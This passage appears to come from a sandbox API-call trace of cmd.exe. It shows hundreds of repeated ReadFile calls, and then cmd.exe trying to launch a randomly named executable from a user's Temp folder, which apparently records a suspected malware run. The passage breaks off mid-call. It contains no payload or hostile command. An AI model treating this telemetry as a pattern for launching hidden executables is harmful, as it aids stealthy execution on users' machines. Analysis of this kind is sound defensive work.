lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, 
lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, 
lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, 
lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, 
lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.839] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile 
(in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.840] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 
[0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.841] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.857] _close (_FileHandle=4) returned 0 [0112.857] FindNextFileW (in: hFindFile=0x3d0f60, lpFindFileData=0x28f458 | out: lpFindFileData=0x28f458) returned 0 [0112.857] GetLastError () returned 0x12 
[0112.857] FindClose (in: hFindFile=0x3d0f60 | out: hFindFile=0x3d0f60) returned 1 [0112.857] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0112.860] _close (_FileHandle=3) returned 0 [0112.860] GetConsoleTitleW (in: lpConsoleTitle=0x28f8f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.860] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe\"")) returned 0xffffffff [0112.860] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0112.860] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0112.860] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0112.860] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0112.860] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0112.860] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0112.860] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0112.860] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0112.860] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0112.860] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0112.860] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0112.860] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0112.860] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0112.860] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0112.861] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0112.861] _wcsicmp 
(_String1="\"C", _String2="SHIFT") returned -81 [0112.861] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0112.861] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0112.861] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0112.861] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0112.861] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0112.861] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0112.861] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0112.861] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0112.861] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0112.861] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0112.861] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0112.861] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0112.861] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0112.861] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0112.861] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0112.861] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0112.861] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0112.861] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0112.861] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="REN") 
returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0112.861] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0112.861] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0112.861] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0112.861] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0112.861] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0112.861] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0112.861] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0112.862] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0112.862] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0112.862] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0112.862] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0112.862] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0112.862] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0112.862] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0112.862] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0112.862] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0112.862] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0112.862] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0112.862] _wcsicmp 